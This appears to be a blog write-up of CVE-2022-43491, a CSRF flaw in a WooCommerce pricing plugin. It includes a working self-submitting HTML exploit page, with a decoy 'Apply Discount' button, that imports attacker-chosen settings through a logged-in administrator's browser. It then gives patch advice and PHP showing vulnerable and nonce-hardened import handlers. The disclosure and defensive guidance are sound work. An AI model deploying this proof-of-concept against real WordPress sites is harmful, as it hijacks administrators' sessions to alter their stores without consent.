A Cross-Site Request Forgery (CSRF) vulnerability was recently disclosed in the "Advanced Dynamic Pricing for WooCommerce" WordPress plugin, affecting versions 4.1.5 and earlier. It allows an attacker to trick a logged-in WordPress administrator into importing attacker-controlled plugin settings. This post explains CVE-2022-43491, including how the attack works, a proof-of-concept page, and links to the original references.

Vulnerability Details

The vulnerability exists because the plugin's "Import plugin settings" handler does not verify that the request was intentionally submitted by the administrator: it processes the import without checking a WordPress nonce (or otherwise validating the request's origin). Since the browser automatically attaches the victim's WordPress session cookies to any request sent to the site, an attacker can host a web page containing a hidden, self-submitting form that posts to the import endpoint. When a logged-in administrator visits that page (or clicks a link leading to it), the browser submits the form, the request arrives authenticated as the administrator, and the attacker's settings are imported into the victim's site. This is a request-origin problem rather than a privilege problem: the forged request genuinely comes from a privileged user's browser, so a capability check alone does not stop it.

Below is a proof-of-concept page demonstrating the attack. The admin-post.php action value and the settings field name are the ones used in this post's proof-of-concept; confirm them against the plugin's import handler for the target version before relying on them.

<!DOCTYPE html>
<html>
<head>
    <title>Exploit CVE-2022-43491</title>
</head>
<body>
    <h2>CVE-2022-43491 - CSRF Exploit</h2>
    <!-- The form posts to admin-post.php on the target site. The victim's browser
         attaches their WordPress session cookies automatically, so the attacker
         never needs credentials. -->
    <form id="exploit-form"
          action="http://TARGET-WORDPRESS-SITE/wp-admin/admin-post.php"
          method="post" enctype="multipart/form-data">
        <input type="hidden" name="action" value="wdp_import_settings">
        <!-- Replace 'MALICIOUS-SETTINGS-CONTENT' with your crafted settings -->
        <input type="hidden" name="settings" value="MALICIOUS-SETTINGS-CONTENT">
        <!-- _wp_http_referer is a WordPress convention naming the originating
             admin page; it is not a security check and is included only to
             mimic a legitimate submission. -->
        <input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=wdp_settings">
        <!-- Visible button is a fallback (and social-engineering cover)
             if the auto-submit below does not run. -->
        <input type="submit" value="Apply Discount">
    </form>
    <script>
        // Submit as soon as the page loads: the victim only has to visit it.
        document.getElementById("exploit-form").submit();
    </script>
</body>
</html>

Replace TARGET-WORDPRESS-SITE in the form's action attribute with the target site's URL, and MALICIOUS-SETTINGS-CONTENT with the crafted settings payload. Because the form submits itself, a logged-in administrator only needs to load the page for the import to occur.

Original References

1. Official CVE-2022-43491 NVD Listing
2. WPCampus Plugin Security Audit Report (Page 10, Section 4.6)

Mitigation

The vulnerability was patched in version 4.1.6 of the "Advanced Dynamic Pricing for WooCommerce" plugin. Update to 4.1.6 or later. Administrators should also be cautious with unsolicited links while logged in to wp-admin, since a CSRF attack only needs the browser to load a page. For plugin developers, the standard WordPress defence is to render a nonce in the import form with wp_nonce_field() and verify it in the handler with check_admin_referer() or wp_verify_nonce(), in addition to the capability check, so that a request not originating from the plugin's own settings page is rejected. Note that browsers which treat cookies lacking a SameSite attribute as SameSite=Lax (Chromium-based browsers since 2020) withhold the session cookie from a cross-site top-level POST and may block this proof-of-concept; that is a browser-side mitigation, not a fix, and the server-side nonce check remains the reliable one.
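To make the missing check concrete, here is an added example written for this post; it is not the plugin's own code. The hook name admin_post_wdp_import_settings, the option name wdp_settings_example, the capability manage_woocommerce, the nonce name wdp_import_nonce, and the assumption that the settings payload is JSON are all illustrative. The first handler accepts any POST that arrives with an administrator's cookies, which is exactly what the proof-of-concept page above exploits; the second rejects the forged request because a page on another origin cannot obtain a valid nonce for the victim's session.

```php
<?php
// Added example for this post; not the plugin's own code. The hook, option,
// capability, nonce and field names below are illustrative assumptions.

// --- Vulnerable pattern: capability check only, no nonce check ----------------
// A forged cross-site POST passes current_user_can() because the victim's
// browser attached a genuine administrator session cookie.
function wdp_example_import_settings_vulnerable() {
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_die( 'Insufficient permissions', 403 );
    }
    $raw  = isset( $_POST['settings'] ) ? wp_unslash( $_POST['settings'] ) : '';
    $data = json_decode( $raw, true );            // assumes a JSON export format
    if ( is_array( $data ) ) {
        update_option( 'wdp_settings_example', $data );   // attacker-controlled
    }
    wp_safe_redirect( admin_url( 'admin.php?page=wdp_settings&imported=1' ) );
    exit;
}

// --- Hardened pattern: nonce check, then capability check ---------------------
// The settings page must render the nonce inside its own form (see below).
// check_admin_referer() verifies the nonce in $_POST['wdp_import_nonce'] and
// stops the request if it is missing or invalid. The nonce is tied to the
// logged-in user's session and is only ever embedded in wp-admin pages, so a
// form hosted on another origin cannot supply it.
function wdp_example_import_settings_hardened() {
    check_admin_referer( 'wdp_import_settings', 'wdp_import_nonce' );
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_die( 'Insufficient permissions', 403 );
    }
    $raw  = isset( $_POST['settings'] ) ? wp_unslash( $_POST['settings'] ) : '';
    $data = json_decode( $raw, true );            // assumes a JSON export format
    if ( ! is_array( $data ) ) {
        wp_die( 'Invalid settings payload', 400 );
    }
    // Allow-list the keys and coerce types instead of storing arbitrary input.
    $clean = array(
        'enabled'      => ! empty( $data['enabled'] ),
        'max_discount' => isset( $data['max_discount'] )
            ? min( 100, max( 0, (int) $data['max_discount'] ) )
            : 0,
    );
    update_option( 'wdp_settings_example', $clean );
    wp_safe_redirect( admin_url( 'admin.php?page=wdp_settings&imported=1' ) );
    exit;
}

// The legitimate import form, rendered on the plugin's wp-admin settings page.
// wp_nonce_field() emits the hidden nonce input that the hardened handler
// requires; the CSRF page cannot reproduce it.
function wdp_example_render_import_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin-post.php' ) ) . '">';
    echo '<input type="hidden" name="action" value="wdp_import_settings">';
    wp_nonce_field( 'wdp_import_settings', 'wdp_import_nonce' );
    echo '<textarea name="settings" rows="10" cols="80"></textarea>';
    submit_button( 'Import settings' );
    echo '</form>';
}

// Register only the hardened handler for the admin-post.php "action" value.
add_action( 'admin_post_wdp_import_settings', 'wdp_example_import_settings_hardened' );
```

The nonce check is placed before the capability check deliberately: a request that fails it is rejected regardless of who the cookies belong to, and the error path never reaches code that touches plugin state. The allow-listing of imported keys is a separate hardening step, since an import feature that writes arbitrary structures to the options table is a liability even when the request is genuine.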

Conclusion

To sum up, CVE-2022-43491 is a Cross-Site Request Forgery vulnerability in the "Advanced Dynamic Pricing for WooCommerce" WordPress plugin, versions 4.1.5 and earlier, that lets an attacker import attacker-controlled plugin settings into a victim's site by having a logged-in administrator load a malicious page. The proof-of-concept in this post demonstrates the attack, and the resources listed under Original References provide further detail. Updating the plugin to 4.1.6 or later fixes the issue.

Timeline

Published on: 11/08/2022 19:15:00 UTC
Last modified on: 11/09/2022 13:55:00 UTC